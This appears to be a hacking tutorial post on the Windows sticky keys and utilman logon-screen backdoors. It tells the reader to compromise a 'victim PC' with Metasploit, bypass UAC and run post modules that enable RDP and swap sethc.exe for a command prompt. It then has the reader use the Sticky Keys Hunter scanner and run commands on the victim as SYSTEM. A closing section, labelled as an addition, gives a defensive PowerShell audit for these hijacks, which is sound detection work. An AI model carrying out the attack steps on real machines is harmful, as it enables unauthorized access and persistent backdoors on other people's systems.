Access Sticky Keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for sticky keys and utilman backdoors. The script connects to an RDP server, sends both the sticky keys and utilman triggers, and screenshots the result.

How does it work?

  • Connects to RDP using rdesktop
  • Sends shift 5 times using xdotool to trigger sethc.exe backdoors
  • Sends Windows+u using xdotool to trigger utilman.exe backdoors
  • Takes screenshot
  • Kills RDP connection

First, hack the victim PC using Metasploit (tutorial: How to Hack Remote PC).

Bypass the UAC protection of the victim PC (tutorial: How to Bypass UAC Protection).

After getting the session, enable the Remote Desktop option on the remote PC using the following post module:

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In the next step, replace sticky keys with the command prompt using the following post module:

msf > use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 2

msf post(sticky_keys) > exploit

Now clone the Sticky Keys Hunter repository from GitHub. To do so, type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

To scan a single host: ./stickyKeysHunter.sh 192.168.0.120

A pop-up window will now open.

Now press the Shift key 5 times at the login screen, and a command prompt will open.

Now you can do anything on the victim PC through the command prompt. I am using the net user command to see the list of active accounts.
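To check a Windows host locally for the backdoor that the scanner above probes over RDP, the following PowerShell audit is an added example, not part of the original post or of the Sticky Keys Hunter project. It covers two common forms of the backdoor: an Image File Execution Options "Debugger" value on the accessibility binary, and the binary itself overwritten with a shell. Only sethc.exe and utilman.exe come from the page; the other binary names are an assumption added for coverage.

```powershell
# Added defensive example: audit this host for logon-screen accessibility backdoors.
# Run from an elevated 64-bit PowerShell prompt on the machine being checked.
$sys32 = Join-Path $env:SystemRoot 'System32'
$ifeo  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# sethc.exe and utilman.exe are the two binaries the page names; the rest are
# other programs reachable from the logon screen (assumption, added for coverage).
$targets = 'sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe', 'narrator.exe', 'displayswitch.exe'

# Hash the shells that are typically swapped in, to use as a comparison baseline.
$shellHashes = @{}
foreach ($shell in 'cmd.exe', 'WindowsPowerShell\v1.0\powershell.exe') {
    $shellPath = Join-Path $sys32 $shell
    if (Test-Path $shellPath) {
        $shellHashes[(Get-FileHash $shellPath -Algorithm SHA256).Hash] = $shell
    }
}

$findings = foreach ($name in $targets) {
    # Form 1: an IFEO "Debugger" value makes Windows launch another program instead.
    $key = Join-Path $ifeo $name
    $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        [pscustomobject]@{ Binary = $name; Check = 'IFEO Debugger set'; Detail = $dbg }
    }

    # Form 2: the accessibility binary was replaced by a copy of a shell.
    $path = Join-Path $sys32 $name
    if (-not (Test-Path $path)) { continue }
    $hash = (Get-FileHash $path -Algorithm SHA256).Hash
    if ($shellHashes.ContainsKey($hash)) {
        [pscustomobject]@{ Binary = $name; Check = 'File is a copy of a shell'; Detail = $shellHashes[$hash] }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    'No accessibility-binary hijack indicators found.'
}
```

Any row in the output means the listed binary will start something other than the genuine accessibility tool at the logon screen; removing the Debugger value or restoring the original file (for example with sfc /scannow) closes it.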
